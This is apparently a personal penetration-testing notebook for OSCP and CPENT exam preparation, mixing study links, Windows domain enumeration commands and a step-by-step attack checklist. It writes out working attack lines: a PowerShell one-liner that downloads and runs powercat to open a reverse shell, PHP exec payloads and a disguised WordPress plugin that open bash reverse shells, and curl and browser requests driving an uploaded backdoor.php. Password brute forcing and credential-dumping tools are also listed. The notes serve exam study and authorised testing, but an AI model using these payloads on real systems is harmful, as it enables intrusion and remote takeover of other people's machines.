寫作之難，在於把網狀的思考，用樹狀結構，展現在線性展開的語句裡。

 https://hack543.com/kali-linux-virtualenv-python2-exploit/ https://www.kali.org/docs/general-use/using-eol-python-versions/

 find username in the local machine net user  find username in the domain net user /domain Get the information for specific username in the domain net user <username> /domain enumerate groups in the domain with  net group : net group /domain enumerate the group members net group "<group name>" /domain

 https://hackmd.io/@6AhJdzpGTyGDlAxru4jZbA/r1fLYbAx0?utm_source=preview-mode&utm_medium=rec https://www.amazon.com/EC-Council-CPENT-Exam-Prep-Explanations/dp/B0DK5SNJBS https://wiki.rice.edu/confluence/download/attachments/237338630/eccouncil-cpent-dumps-exam-questions-2025-perfect-resource-to-secure-success.html?api=v2 https://infosecjake.net/?p=355

 https://www.youtube.com/playlist?app=desktop&list=PLuyTk2_mYISLaZC4fVqDuW_hOk0dd5rlf

 https://blog.keniver.com/2023/01/oscp-exam-guide/ https://hackercat.org/oscp/oscp-review https://ithelp.ithome.com.tw/m/articles/10354135 https://peterkan.tw/2024/02/15/all-about-oscp/ https://tech-blog.cymetrics.io/posts/crystal/oscp-review/ https://hackercat.org/oscp/buffer-overflows-made-easy-notes-oscp-preparation https://hackmd.io/@7ZcmfE2ETz-ntel2Ma6uTg/SJsPftiB1x https://www.youtube.com/watch?v=Rm73FZ0K01g&list=PLcSbj5mz-wxMIiOjtknvQDwKsL0XKHMbN https://github.com/In3x0rabl3/OSCP OSEP: https://github.com/In3x0rabl3/OSEP/blob/main/osep_reference.md https://hackmd.io/@CHW/H1F8rLl5kg?utm_source=preview-mode&utm_medium=rec 1. nmap掃弱點。TCP和UDP都要。 2. 到處點點看網頁，可利用的帳號可能就在網頁上。(極度愚蠢的帳號密碼組合) 3. 網頁爆破 gobuster dir -u http://192.168.219.197/ -w  /usr/share/wordlists/dirb/common.txt 4. 檢查網頁模板的漏洞 (改一下大小寫，可能就可以跳過檢查) 5. 連進去之後，馬上輸入(1) Linux: id (2) Windows: whoami /priv 5. crontab -l，檢查crontab，找看看有沒有script 6. 檢查Scirpt裡面可能帶明碼 A. grep -i sshpass B. grep -i ftp C. grep -i sf...

 Powershell One-liner Reverse Shell https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3 https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58 Powershell get remote file IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell 

xfreerdp /u: /d: /p: /v: /size:100% /cert:ignore

 $_GET['cmd']; die(); exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.228/4444 0>&1'"); ================= <?php /** Author: Kai Plugin Name: PHP Code Plugin Description: Shell Through Plugins Version: 1.0 */ exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.116.129/443 0>&1'"); ?> ================== https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php ================== curl http://192.168.192.11/project/uploads/users/603339-backdoor.php --data-urlencode "cmd=/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.194/8888 0>&1'" ================== FireFox URL http://192.168.192.11/project/uploads/users/603339-backdoor.php?cmd=%2Fbin%2Fbash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E45%2E194%2F8888%200%3E%261%27%0A%0A ================== /usr/share/webshells/php ================== weevely

 wpscan --url=http://xxx.xxx.xxx. -e u,p wpscan --url=http://xxx.xxx.xxx. -e u,p --usernames username_file --passwords passwd_file

[Host] Nmap掃描TCP Nmap掃描UDP [Website] 用瀏覽器開看看 Whatweb 檢查原始檔 Dirb/Gobuster/feroxbuster，最後要補或不補 "/" robots.txt/sitemap.xml nmap -sVC wappalyzer [ReverseShell] https://www.revshells.com/ Payloads_All_The_Things Powershell on liner Reverse shell generator [Encode/Decode] https://gchq.github.io/CyberChef/ https://jscompress.com/ [Linux Enum] lynis enmu4linux leysh [Wordpress] Core Theme Plug-in [Web Form]  ffuf OSWAP ZAP [XXS Script] https://github.com/The-Art-of-Hacking/h4cker/blob/master/web_application_testing/xss_vectors.md https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html [AD Enumeration] NETBIOS name: nbtstat -A IP Mimikatz psexec \\<IP>: cmd.exe pth-exec(?) winrm nmap -n -sS -p 137,138,139,445 --script smb-os-discovery <IP> [Remote Desktop] xfreerdp /u:user /p:IP /v:ip /cert-ignore [SAMBA]  nmap -sS -n -p 445 --script smb-protocols <IP> Check Samba: net view \\IP [Python Web Server]  python3 -m http.server 8080 [Linux es...